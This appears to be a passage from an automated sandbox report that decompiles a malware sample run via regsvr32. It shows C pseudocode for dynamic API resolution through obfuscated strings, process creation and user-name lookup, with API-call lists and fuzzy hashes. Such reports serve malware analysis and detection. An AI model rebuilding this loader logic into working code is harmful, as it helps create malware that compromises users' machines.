                                                                                                                                                                                                                                    0x023e8199
                                                                                                                                                                                                                                    0x023e819c
                                                                                                                                                                                                                                    0x023e819e
                                                                                                                                                                                                                                    0x023e819e
                                                                                                                                                                                                                                    0x023e81a7
                                                                                                                                                                                                                                    0x023e81ae
                                                                                                                                                                                                                                    0x023e81b1
                                                                                                                                                                                                                                    0x023e81b7
                                                                                                                                                                                                                                    0x023e81c1
                                                                                                                                                                                                                                    0x023e81ca
                                                                                                                                                                                                                                    0x023e81d1
                                                                                                                                                                                                                                    0x023e81ea
                                                                                                                                                                                                                                    0x023e81f1
                                                                                                                                                                                                                                    0x023e81f4
                                                                                                                                                                                                                                    0x023e81fd
                                                                                                                                                                                                                                    0x023e8206
                                                                                                                                                                                                                                    0x023e8217
                                                                                                                                                                                                                                    0x023e8220
                                                                                                                                                                                                                                    0x023e8224
                                                                                                                                                                                                                                    0x023e8228
                                                                                                                                                                                                                                    0x023e822f
                                                                                                                                                                                                                                    0x023e8232
                                                                                                                                                                                                                                    0x023e8234
                                                                                                                                                                                                                                    0x023e8234
                                                                                                                                                                                                                                    0x023e823e
                                                                                                                                                                                                                                    0x023e8247
                                                                                                                                                                                                                                    0x023e824e
                                                                                                                                                                                                                                    0x023e8266
                                                                                                                                                                                                                                    0x023e826a
                                                                                                                                                                                                                                    0x023e82a7
                                                                                                                                                                                                                                    0x023e826c
                                                                                                                                                                                                                                    0x023e826f
                                                                                                                                                                                                                                    0x023e8277
                                                                                                                                                                                                                                    0x023e8288
                                                                                                                                                                                                                                    0x023e8294
                                                                                                                                                                                                                                    0x023e829c
                                                                                                                                                                                                                                    0x023e82a0
                                                                                                                                                                                                                                    0x023e82a0
                                                                                                                                                                                                                                    0x023e826a
                                                                                                                                                                                                                                    0x023e82af
                                                                                                                                                                                                                                    0x023e82b4
                                                                                                                                                                                                                                    0x023e82bb

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 023E8181
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,80000002,00000005), ref: 023E81C1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 023E81CA
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 023E81D1
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(80000002), ref: 023E81DE
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000004), ref: 023E823E
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 023E8247
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 023E824E
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 023E8255
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2535036572-0
                                                                                                                                                                                                                                    • Opcode ID: 9923dee0dc2a905cf31ef747fe6db6201a06da8c130f2d0349605b56bf560990
                                                                                                                                                                                                                                    • Instruction ID: b87bbf38d675e14b16849dea85abb8a5996d8b4d73b195360fccdffedddbd70d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9923dee0dc2a905cf31ef747fe6db6201a06da8c130f2d0349605b56bf560990
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF412CB2D00129EFDF21AFA4CD04A9EBBB9EF48314F054451ED05A72A1D7369E29DF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                    			E023E205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E023E692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E023EA8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x23ed260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x23ed27c; // 0x28da5a8
					_t18 = _t47 + 0x23ee3e6; // 0x73797325
					_t68 = E023E95B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x23ed27c; // 0x28da5a8
						_t19 = _t50 + 0x23ee747; // 0x4cc8cef
						_t20 = _t50 + 0x23ee0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E023E84D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E023E84D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x23ed238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E023E9039(_t70);
				goto L12;
			}


















                                                                                                                                                                                                                                    0x023e2066
                                                                                                                                                                                                                                    0x023e2066
                                                                                                                                                                                                                                    0x023e2075
                                                                                                                                                                                                                                    0x023e207e
                                                                                                                                                                                                                                    0x023e2081
                                                                                                                                                                                                                                    0x023e218e
                                                                                                                                                                                                                                    0x023e2195
                                                                                                                                                                                                                                    0x023e2195
                                                                                                                                                                                                                                    0x023e2090
                                                                                                                                                                                                                                    0x023e2098
                                                                                                                                                                                                                                    0x023e209d
                                                                                                                                                                                                                                    0x023e20a0
                                                                                                                                                                                                                                    0x023e20b5
                                                                                                                                                                                                                                    0x023e20bb
                                                                                                                                                                                                                                    0x023e20bc
                                                                                                                                                                                                                                    0x023e20bf
                                                                                                                                                                                                                                    0x023e20c5
                                                                                                                                                                                                                                    0x023e20c8
                                                                                                                                                                                                                                    0x023e20cd
                                                                                                                                                                                                                                    0x023e20d5
                                                                                                                                                                                                                                    0x023e20e1
                                                                                                                                                                                                                                    0x023e20e5
                                                                                                                                                                                                                                    0x023e2175
                                                                                                                                                                                                                                    0x023e20eb
                                                                                                                                                                                                                                    0x023e20eb
                                                                                                                                                                                                                                    0x023e20f0
                                                                                                                                                                                                                                    0x023e20f7
                                                                                                                                                                                                                                    0x023e210b
                                                                                                                                                                                                                                    0x023e210f
                                                                                                                                                                                                                                    0x023e215e
                                                                                                                                                                                                                                    0x023e2111
                                                                                                                                                                                                                                    0x023e2112
                                                                                                                                                                                                                                    0x023e2119
                                                                                                                                                                                                                                    0x023e2132
                                                                                                                                                                                                                                    0x023e2134
                                                                                                                                                                                                                                    0x023e2138
                                                                                                                                                                                                                                    0x023e213f
                                                                                                                                                                                                                                    0x023e2159
                                                                                                                                                                                                                                    0x023e2141
                                                                                                                                                                                                                                    0x023e214a
                                                                                                                                                                                                                                    0x023e214f
                                                                                                                                                                                                                                    0x023e214f
                                                                                                                                                                                                                                    0x023e213f
                                                                                                                                                                                                                                    0x023e216d
                                                                                                                                                                                                                                    0x023e216d
                                                                                                                                                                                                                                    0x023e20e5
                                                                                                                                                                                                                                    0x023e217c
                                                                                                                                                                                                                                    0x023e2185
                                                                                                                                                                                                                                    0x023e2189
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,023E207A,?,00000001,?,?,00000000,00000000), ref: 023E6951
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 023E6973
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 023E6989
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 023E699F
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 023E69B5
                                                                                                                                                                                                                                      • Part of subcall function 023E692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 023E69CB
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E20C8
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,023E23E9,63699BCE,023E1354,73797325), ref: 023E95C2
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 023E95DC
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4E52454B,04CC8CEF,73797325), ref: 023E20FE
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 023E2105
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 023E216D
                                                                                                                                                                                                                                      • Part of subcall function 023E84D5: GetProcAddress.KERNEL32(36776F57,023E21E5), ref: 023E84F0
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000001), ref: 023E214A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 023E214F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001), ref: 023E2153
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3075724336-0
                                                                                                                                                                                                                                    • Opcode ID: b154b32f82febcf623578821b34520440eb309eb2bb2e3ac08c9cb107583e68b
                                                                                                                                                                                                                                    • Instruction ID: a97c2307977abe6db5d73413352ea89620542e3b5aced248005f605c303ae8dc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b154b32f82febcf623578821b34520440eb309eb2bb2e3ac08c9cb107583e68b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D310CB2D00218EFDF209FA4D884E9FBBBDEB08354F014865EA16A7191D735AE49CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E8307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                                    			E023E8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x23ed27c; // 0x28da5a8
				_t1 = _t9 + 0x23ee62c; // 0x253d7325
				_t36 = 0;
				_t28 = E023E9401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E023E2049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E023E7225(_t34, _t41, _a8);
						E023E9039(_t41);
						_t42 = E023E8E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E023E9039(_t36);
							_t36 = _t42;
						}
						_t43 = E023E788B(_t36, _t33);
						if(_t43 != 0) {
							E023E9039(_t36);
							_t36 = _t43;
						}
					}
					E023E9039(_t28);
				}
				return _t36;
			}














                                                                                                                                                                                                                                    0x023e8307
                                                                                                                                                                                                                                    0x023e830a
                                                                                                                                                                                                                                    0x023e830b
                                                                                                                                                                                                                                    0x023e8313
                                                                                                                                                                                                                                    0x023e831a
                                                                                                                                                                                                                                    0x023e8321
                                                                                                                                                                                                                                    0x023e8325
                                                                                                                                                                                                                                    0x023e832b
                                                                                                                                                                                                                                    0x023e8332
                                                                                                                                                                                                                                    0x023e8337
                                                                                                                                                                                                                                    0x023e8349
                                                                                                                                                                                                                                    0x023e834d
                                                                                                                                                                                                                                    0x023e8351
                                                                                                                                                                                                                                    0x023e8357
                                                                                                                                                                                                                                    0x023e835c
                                                                                                                                                                                                                                    0x023e836c
                                                                                                                                                                                                                                    0x023e836e
                                                                                                                                                                                                                                    0x023e8385
                                                                                                                                                                                                                                    0x023e8389
                                                                                                                                                                                                                                    0x023e838c
                                                                                                                                                                                                                                    0x023e8391
                                                                                                                                                                                                                                    0x023e8391
                                                                                                                                                                                                                                    0x023e839a
                                                                                                                                                                                                                                    0x023e839e
                                                                                                                                                                                                                                    0x023e83a1
                                                                                                                                                                                                                                    0x023e83a6
                                                                                                                                                                                                                                    0x023e83a6
                                                                                                                                                                                                                                    0x023e839e
                                                                                                                                                                                                                                    0x023e83a9
                                                                                                                                                                                                                                    0x023e83a9
                                                                                                                                                                                                                                    0x023e83b4

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E9401: lstrlen.KERNEL32(00000000,00000000,00000000,73FCC740,?,?,?,023E8321,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?), ref: 023E9468
                                                                                                                                                                                                                                      • Part of subcall function 023E9401: sprintf.NTDLL ref: 023E9489
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,023EA428,?,04CC95B0), ref: 023E8332
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,?,023EA428,?,04CC95B0), ref: 023E833A
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • strcpy.NTDLL ref: 023E8351
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 023E835C
                                                                                                                                                                                                                                      • Part of subcall function 023E7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,023E836B,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E723C
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,023EA428,?,04CC95B0), ref: 023E8379
                                                                                                                                                                                                                                      • Part of subcall function 023E8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,023E8385,00000000,?,?,023EA428,?,04CC95B0), ref: 023E8E8C
                                                                                                                                                                                                                                      • Part of subcall function 023E8E82: _snprintf.NTDLL ref: 023E8EEA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                    • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                    • Opcode ID: 8d56f39aaaf8cb3f2b7671b4b0299db2199ba89456ae38f62982c2365b7d8edd
                                                                                                                                                                                                                                    • Instruction ID: 92ae032f6ddee5ad81b888ad93419f1b684259d0fba55cb950764ca3b3b481c2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d56f39aaaf8cb3f2b7671b4b0299db2199ba89456ae38f62982c2365b7d8edd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA11E373900234AB8E32BBB5AC84CAF379EAF887647050416F506AB180DA35DD0A5BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E6CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 023E6D1F
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0070006F), ref: 023E6D33
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 023E6D45
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E6DA9
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E6DB8
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E6DC3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                    • Opcode ID: 8b48be0800a65475c1286277926401b8f2517659cb1b5a07d09232151801ee90
                                                                                                                                                                                                                                    • Instruction ID: 3fc723cfbbf9a16c7e5afb0be2b44c3b5cbe6230cccbb25b5c8bd72ef36a0999
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b48be0800a65475c1286277926401b8f2517659cb1b5a07d09232151801ee90
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7316B32D00619EFDF11DFB9C845A9FB7BAAF48304F544426E911EB2A0DB71990ACF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E023E2049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x23ed27c; // 0x28da5a8
					_t1 = _t23 + 0x23ee11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x23ed27c; // 0x28da5a8
					_t2 = _t26 + 0x23ee769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E023E9039(_t54);
					} else {
						_t30 =  *0x23ed27c; // 0x28da5a8
						_t5 = _t30 + 0x23ee756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x23ed27c; // 0x28da5a8
							_t7 = _t33 + 0x23ee40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x23ed27c; // 0x28da5a8
								_t9 = _t36 + 0x23ee4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x23ed27c; // 0x28da5a8
									_t11 = _t39 + 0x23ee779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E023E727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                                                                                                                    0x023e693b
                                                                                                                                                                                                                                    0x023e693f
                                                                                                                                                                                                                                    0x023e6a01
                                                                                                                                                                                                                                    0x023e6945
                                                                                                                                                                                                                                    0x023e6945
                                                                                                                                                                                                                                    0x023e694a
                                                                                                                                                                                                                                    0x023e695d
                                                                                                                                                                                                                                    0x023e695f
                                                                                                                                                                                                                                    0x023e6964
                                                                                                                                                                                                                                    0x023e696c
                                                                                                                                                                                                                                    0x023e6973
                                                                                                                                                                                                                                    0x023e6977
                                                                                                                                                                                                                                    0x023e697a
                                                                                                                                                                                                                                    0x023e69f9
                                                                                                                                                                                                                                    0x023e69fa
                                                                                                                                                                                                                                    0x023e697c
                                                                                                                                                                                                                                    0x023e697c
                                                                                                                                                                                                                                    0x023e6981
                                                                                                                                                                                                                                    0x023e6989
                                                                                                                                                                                                                                    0x023e698d
                                                                                                                                                                                                                                    0x023e6990
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e6992
                                                                                                                                                                                                                                    0x023e6992
                                                                                                                                                                                                                                    0x023e6997
                                                                                                                                                                                                                                    0x023e699f
                                                                                                                                                                                                                                    0x023e69a3
                                                                                                                                                                                                                                    0x023e69a6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e69a8
                                                                                                                                                                                                                                    0x023e69a8
                                                                                                                                                                                                                                    0x023e69ad
                                                                                                                                                                                                                                    0x023e69b5
                                                                                                                                                                                                                                    0x023e69b9
                                                                                                                                                                                                                                    0x023e69bc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e69be
                                                                                                                                                                                                                                    0x023e69be
                                                                                                                                                                                                                                    0x023e69c3
                                                                                                                                                                                                                                    0x023e69cb
                                                                                                                                                                                                                                    0x023e69cf
                                                                                                                                                                                                                                    0x023e69d2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e69d4
                                                                                                                                                                                                                                    0x023e69da
                                                                                                                                                                                                                                    0x023e69df
                                                                                                                                                                                                                                    0x023e69e6
                                                                                                                                                                                                                                    0x023e69ed
                                                                                                                                                                                                                                    0x023e69f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e69f2
                                                                                                                                                                                                                                    0x023e69f5
                                                                                                                                                                                                                                    0x023e69f5
                                                                                                                                                                                                                                    0x023e69f0
                                                                                                                                                                                                                                    0x023e69d2
                                                                                                                                                                                                                                    0x023e69bc
                                                                                                                                                                                                                                    0x023e69a6
                                                                                                                                                                                                                                    0x023e6990
                                                                                                                                                                                                                                    0x023e697a
                                                                                                                                                                                                                                    0x023e6a0f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,023E207A,?,00000001,?,?,00000000,00000000), ref: 023E6951
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 023E6973
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 023E6989
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 023E699F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 023E69B5
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 023E69CB
                                                                                                                                                                                                                                      • Part of subcall function 023E727B: memset.NTDLL ref: 023E72FA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1886625739-0
                                                                                                                                                                                                                                    • Opcode ID: ff5edbcd6f403212deb4f6f8db62b8b627aed2e1ea1fe4b8099696b71409f0dd
                                                                                                                                                                                                                                    • Instruction ID: 273410ddcb5c3b65178c80b7bc893fe018b8c62b97bd832748223e89008c992e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff5edbcd6f403212deb4f6f8db62b8b627aed2e1ea1fe4b8099696b71409f0dd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB2151F1A4121ADFDF20DFA9D845E6A77FCEB18354B024526E605DB2C1D731EA098F60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E7649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E7649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
